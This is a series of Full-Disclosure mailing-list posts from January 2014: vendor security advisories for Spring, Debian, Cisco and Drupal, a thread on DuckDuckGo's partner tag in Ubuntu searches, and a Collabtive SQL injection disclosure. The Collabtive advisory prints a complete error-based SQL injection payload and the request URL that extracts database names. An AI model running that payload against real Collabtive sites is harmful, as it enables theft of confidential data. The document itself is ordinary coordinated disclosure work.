Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
There is a reddit post regarding this. Please see http://www.reddit.com/r/Ubuntu/comments/1jek5d/why_am_i_seeing_canonical_when_i_search_using/ Daniel On Jan 14, 2014, at 6:41 AM, silence_is_b...@hushmail.com wrote: Any particular reason when setting duckduckgo as the default search and searching from the url bar we get an additional nugget of info sent? Case in point: GET /?q=add+duckduckgot=canonical HTTP/1.1 Hostduckduckgo.com User-AgentMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 Accepttext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Languageen-US,en;q=0.5 Accept-Encodinggzip, deflate DNT1 Connectionkeep-alive I didn't add canonical...so why is it there? In about:config I see distribution.id canonical Why is this being sent? Duckduckgo didn't respond, so I thought I'd ask here. Ironic... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2013-6429 Fix for XML External Entity (XXE) injection (CVE-2013-4152) in Spring Framework was incomplete
Severity: Important Vendor: Spring by Pivotal Versions Affected: - Spring MVC 3.0.0 to 3.2.4 - Spring MVC 4.0.0.M1-4.0.0.RC1 - Earlier unsupported versions may be affected Description: Spring MVC's SourceHttpMessageConverter also processed user provided XML and neither disabled XML external entities nor provided an option to disable them. SourceHttpMessageConverter has been modified to provide an option to control the processing of XML external entities and that processing is now disabled by default. Mitigation: Users of affected versions should apply the following mitigation: - Users of 3.x should upgrade to 3.2.5 or later - Users of 4.x should upgrade to 4.0.0 or later (This is also fixed in 4.0.0-RC2 but users are recommended to use 4.0.0 or later) Credit: This issue was identified by the Spring development team. References: http://www.gopivotal.com/security/cve-2013-6429 https://jira.springsource.org/browse/SPR-11078 https://github.com/spring-projects/spring-framework/commit/2ae6a6a3415eebc57babcb9d3e5505887eda6d8a http://www.gopivotal.com/security/cve-2013-4152 History: 2014-Jan-14: Initial vulnerability report published.___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2013-6430 Possible XSS when using Spring MVC
Severity: Low Vendor: Spring by Pivotal Versions Affected: - Spring MVC 3.0.0 to 3.2.1 - Earlier unsupported versions may be affected Description: The JavaScriptUtils.javaScriptEscape() method did not escape all characters that are sensitive within either a JS single quoted string, JS double quoted string, or HTML script data context. In most cases this will result in an unexploitable parse error but in some cases it could result in an XSS vulnerability. Mitigation: Users of affected versions should apply the following mitigation: - Users of 3.x should upgrade to 3.2.2 or later Credit: This issue was originally reported to the Spring Framework developers by Jon Passki and the security implications brough to the attention of the Pivotal security team by Arun Neelicattu. References: http://www.gopivotal.com/security/cve-2013-6430 https://jira.springsource.org/browse/SPR-9983 https://github.com/spring-projects/spring-framework/commit/7a7df6637478607bef0277bf52a4e0a03e20a248 History: 2014-Jan-14: Initial vulnerability report published.___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
Any particular reason when setting duckduckgo as the default search and searching from the url bar we get an additional nugget of info sent? We use the t=partner parameter to anonymously count the number of searches for revenue sharing. We have 90+ partners doing this, mainly open source browsers and distributions. Here's the relevant link on launchpad for Canonical: https://code.launchpad.net/~caine/chromium-browser/duckduckgo/+merge/182416 -- Gabriel, http://ye.gg/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
On 01/14/2014 at 6:22 PM, Seth Arnold wrote:On Tue, Jan 14, 2014 at 05:41:42AM -0700, silence_is_b...@hushmail.com wrote: Any particular reason when setting duckduckgo as the default search and searching from the url bar we get an additional nugget of info sent? Case in point: GET /?q=add+duckduckgot=canonical HTTP/1.1 [...] I didn't add canonical...so why is it there? In about:config I see [...] Why is this being sent? Duckduckgo didn't respond, so I thought I'd ask here. Ironic... This behaviour is documented on the duckduckgo website: https://duck.co/help/privacy/t https://duck.co/help/desktop/linux-distributions Thanks Thank you for the responses folks. I'm going to take a stab and say the distribution.id is where that's held. It upsets my sense of neatness when I'm spoofing my UA, only to have tidbits added ;) Thanks again. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Collabtive Sql Injection
##=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+## || || || Advisory : Collabtive Sql Injection|| || Affected Version : 1.1 || || Vendor : http://collabtive.o-dyn.de/index.php|| || Risk : Medium || || CVE-ID : 2013-6872 || || Tested on Platform : Windows 7 || ##=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+## == Product Description: Collabtive is web-based project management software. The project was started in November 2007. It is open source software and provides an alternative to proprietary tools like Basecamp. Collabtive is written in PHP and JavaScript. Collabtive is intended for small to medium-sized businesses and freelancers. We offer commercial services for installation and customization of Collabtive. It can also be installed on an internal server as well as in the cloud. All major browsers like Internet Explorer, Firefox, Chrome and Safari are supported. Collabtive is developed by a team of professional volunteers. Everyone involved is a pro in their respective areas, providing high quality contributions to the project. (from product home page) Collabtive has more than 1000 downloads per week. == Vulnerability Description: Double query type of SQL Injection vulnerability has been detected in Collabtive web applivation. Application failed to sanitize user supplied input in parameter id of page managetimetracker.php. User must be authenticated to exploit this vulnerability. This vulnerability was tested with Collabtive 1.1. Other versions may also be affected. === Impact: Successful exploitation of this vulnerability will allow a remote authenticated attacker to extract sensitive and confidential data from the database. === Proof of Concept: URL: http://www.example.com/collabtive/managetimetracker.php?action=projectpdfid=2 PAYLOAD: and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 Example: Following query will show name of first database in error. http://www.example.com/collabtive/managetimetracker.php?action=projectpdfid=2and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 === Solution: There's no known workaround available. This vulnerability has been fixed in version 1.2 of Collabtive. === Disclosure Timeline: ~Vendor notification: 26th November 2013 ~Vendor response: 27th November 2013 ~Vendor released updates: 4th January 2014 ~Public disclosure: 15th January 2014 === Advisory discovered by: Yogesh Phadtare Secur-I Research Group http://securview.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2844-1] djvulibre security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2844-1 secur...@debian.org http://www.debian.org/security/ Raphael Geissert January 15, 2014 http://www.debian.org/security/faq - - Package: djvulibre Vulnerability : arbitrary code execution Problem type : local (remote) Debian-specific: no CVE ID : CVE-2012-6535 It was discovered that djvulibre, the Open Source DjVu implementation project, can be crashed or possibly make it execute arbitrary code when processing a specially crafted djvu file. For the oldstable distribution (squeeze), this problem has been fixed in version 3.5.23-3+squeeze1. This problem has been fixed before the release of the stable distribution (wheezy), therefore it is not affected. We recommend that you upgrade your djvulibre packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iEYEARECAAYFAlLWMNkACgkQYy49rUbZzlpnSQCaAiO7/4BQmnrHakecARECdnqe hj0AmwUTht5DGh7ljX9raoP7RKYDWH/S =TpZ4 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco Secure Access Control System
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Cisco Security Advisory: Multiple Vulnerabilities in Cisco Secure Access Control System Advisory ID: cisco-sa-20140115-csacs Revision 1.0 For Public Release 2014 January 15 12:00 UTC (GMT) +- Summary === Cisco Secure Access Control System (ACS) is affected by the following vulnerabilities: Cisco Secure ACS RMI Privilege Escalation Vulernability Cisco Secure ACS RMI Unauthenticated User Access Vulnerability Cisco Secure ACS Operating System Command Injection Vulnerability Cisco Secure ACS uses the Remote Method Invocation (RMI) interface for internode communication using TCP ports 2020 and 2030. These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the other. Cisco has released free software updates that address these vulnerabilities. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140115-csacs Network-based mitigations for the RMI-based vulnerabilities are outlined in the Cisco Applied Mitigation Bulletin: Identifying and Mitigating the Multiple Vulnerabilities in Cisco Secure Access Control System http://tools.cisco.com/security/center/viewAMBAlert.x?alertId=32120 -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.20 (Darwin) iF4EAREKAAYFAlLWjpIACgkQUddfH3/BbTosbAD/VuzxU5TkUyAhJLycJHyypiRg fZpaJ6IZvX+mjLRTidMA/iYaghbeg9GGU1a9FlRZt+WC/BNaodIGGU35zzlM+Ztb =ffTY -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
On 01/15/2014 at 5:08 AM, Gabriel Weinberg wrote: Any particular reason when setting duckduckgo as the default search and searching from the url bar we get an additional nugget of info sent? We use the t=partner parameter to anonymously count the number of searches for revenue sharing. We have 90+ partners doing this, mainly open source browsers and distributions. Here's the relevant link on launchpad for Canonical: https://code.launchpad.net/~caine/chromium-browser/duckduckgo/+merge/182416 -- Gabriel, http://ye.gg/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I see thank you. My distribution.id nuke did nothingany way to disable this? It's all about choice after all right ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CORE-2014-001 - Drupal core - Multiple vulnerabilities
View online: https://drupal.org/SA-CORE-2014-001 * Advisory ID: DRUPAL-SA-CORE-2014-001 * Project: Drupal core [1] * Version: 6.x, 7.x * Date: 2014-January-15 * Security risk: Highly critical [2] * Exploitable from: Remote * Vulnerability: Multiple vulnerabilities DESCRIPTION - Multiple vulnerabilities were fixed in the supported Drupal core versions 6 and 7. Impersonation (OpenID module - Drupal 6 and 7 - Highly critical) A vulnerability was found in the OpenID module that allows a malicious user to log in as other users on the site, including administrators, and hijack their accounts. This vulnerability is mitigated by the fact that the malicious user must have an account on the site (or be able to create one), and the victim must have an account with one or more associated OpenID identities. Access bypass (Taxonomy module - Drupal 7 - Moderately critical) The Taxonomy module provides various listing pages which display content tagged with a particular taxonomy term. Custom or contributed modules may also provide similar lists. Under certain circumstances, unpublished content can appear on these pages and will be visible to users who should not have permission to see it. This vulnerability is mitigated by the fact that it only occurs on Drupal 7 sites which upgraded from Drupal 6 or earlier. Security hardening (Form API - Drupal 7 - Not critical) The form API provides a method for developers to submit forms programmatically using the function drupal_form_submit(). During programmatic form submissions, all access checks are deliberately bypassed, and any form element may be submitted regardless of the current user's access level. This is normal and expected behavior for most uses of programmatic form submissions; however, there are cases where custom or contributed code may need to send data provided by the current (untrusted) user to drupal_form_submit() and therefore need to respect access control on the form. To facilitate this, a new, optional $form_state['programmed_bypass_access_check'] element has been added to the Drupal 7 form API. If this is provided and set to FALSE, drupal_form_submit() will perform the normal form access checks against the current user while submitting the form, rather than bypassing them. This change does not fix a security issue in Drupal core itself, but rather provides a method for custom or contributed code to fix security issues that would be difficult or impossible to fix otherwise. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Drupal core 6.x versions prior to 6.30. * Drupal core 7.x versions prior to 7.26. SOLUTION Install the latest version: * If you use Drupal 6.x, upgrade to Drupal core 6.30 [4]. * If you use Drupal 7.x, upgrade to Drupal core 7.26 [5]. Also see the Drupal core [6] project page. REPORTED BY - * The OpenID module impersonation issue was reported by Christian Mainka [7] and Vladislav Mladenov. * The Taxonomy module access bypass issue was reported by Matt Vance [8], and by Damien Tournoud [9] of the Drupal Security Team. * The form API access bypass issue was reported by David Rothstein [10] of the Drupal Security Team. FIXED BY * The OpenID module impersonation issue was fixed by Damien Tournoud [11], Heine Deelstra [12], Peter Wolanin [13], and David Rothstein [14], all of the Drupal Security Team. * The Taxonomy module access bypass issue was fixed by Jibran Ijaz [15], and by Lee Rowlands [16] of the Drupal Security Team. * The form API access bypass issue was fixed by Damien Tournoud [17] and David Rothstein [18] of the Drupal Security Team, and by Marc Ingram [19] and Kyle Browning [20]. COORDINATED BY -- * The Drupal Security Team [21] CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [22]. Learn more about the Drupal Security team and their policies [23], writing secure code for Drupal [24], and securing your site [25]. Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity [26] [1] http://drupal.org/project/drupal [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/drupal-6.30-release-notes [5]
[Full-disclosure] [Security-news] SA-CONTRIB-2014-002 - Anonymous Posting - Cross Site Scripting (XSS)
View online: https://drupal.org/node/2173321 * Advisory ID: DRUPAL-SA-CONTRIB-2014-002 * Project: Anonymous Posting [1] (third-party module) * Version: 7.x * Date: 2014-01-15 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module allows anonymous users to fill in their contact information (name, email and homepage) when posting any content type including Forum Topics. This allows the submitted name to be shown instead of the usual anonymous string provided by Drupal core. The module doesn't properly sanitize the name submitted by the anonymous user before it is output. This vulnerability is mitigated only by the fact that use of anonymous posting data must be enabled on a per content type basis by a user with permission to do so since it is not enabled by default. However when configured for it's intended purpose, the vulnerability is not mitigated. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Anonymous Posting 7.x-1.x versions 7.x-1.2 and 7.x-1.3 Drupal core is not affected. If you do not use the contributed Anonymous Posting [4] module, there is nothing you need to do. SOLUTION * Install the latest version: 7.x-1.4 [5] Also see the Anonymous Posting [6] project page. REPORTED BY - * drikc [7] the module maintainer FIXED BY * drikc [8] the module maintainer COORDINATED BY -- * Rick Manelius [9] provisional member of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity [14] [1] http://drupal.org/project/anonymous_posting [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/anonymous_posting [5] https://drupal.org/node/2173437 [6] http://drupal.org/project/anonymous_posting [7] http://drupal.org/user/13299 [8] http://drupal.org/user/13299 [9] http://drupal.org/user/680072 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration [14] https://twitter.com/drupalsecurity ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
On Wed, Jan 15, 2014 at 05:47:24AM -0700, silence_is_b...@hushmail.com wrote: I see thank you. My distribution.id nuke did nothingany way to disable this? It's all about choice after all right ;) Depends upon the browser. For Firefox, see: /usr/lib/firefox/distribution/searchplugins/locale/en-US/duckduckgo.xml The merge at https://code.launchpad.net/~caine/chromium-browser/duckduckgo/+merge/182416 gives me the strong impression that it will be harder to change in chromium-browser; it may take a recompile. Probably it would be easier to add your own search engines to chromium-browser without recompiling, though I don't know chromium-browser well enough to suggest them. Thanks signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu, duckduckgo, and additional info
On Wed, Jan 15, 2014 at 6:47 AM, silence_is_b...@hushmail.com wrote: I see thank you. My distribution.id nuke did nothingany way to disable this? It's all about choice after all right ;) Settings Manage Search Engines Add ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] EE BrightBox router hacked - bares all if you ask nicely
The BrightBox router is the standard equipment issued by UK ISP Everything Everywhere (EE) to its subscribers. The device not only leaks sensitive data but is remotely exploitable too. An attacker even has the ability to take control of your account as the router leaks your ISP account credentials. You can read the full article here: https://scotthelme.co.uk/ee-brightbox-router-hacked/ Scott.___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/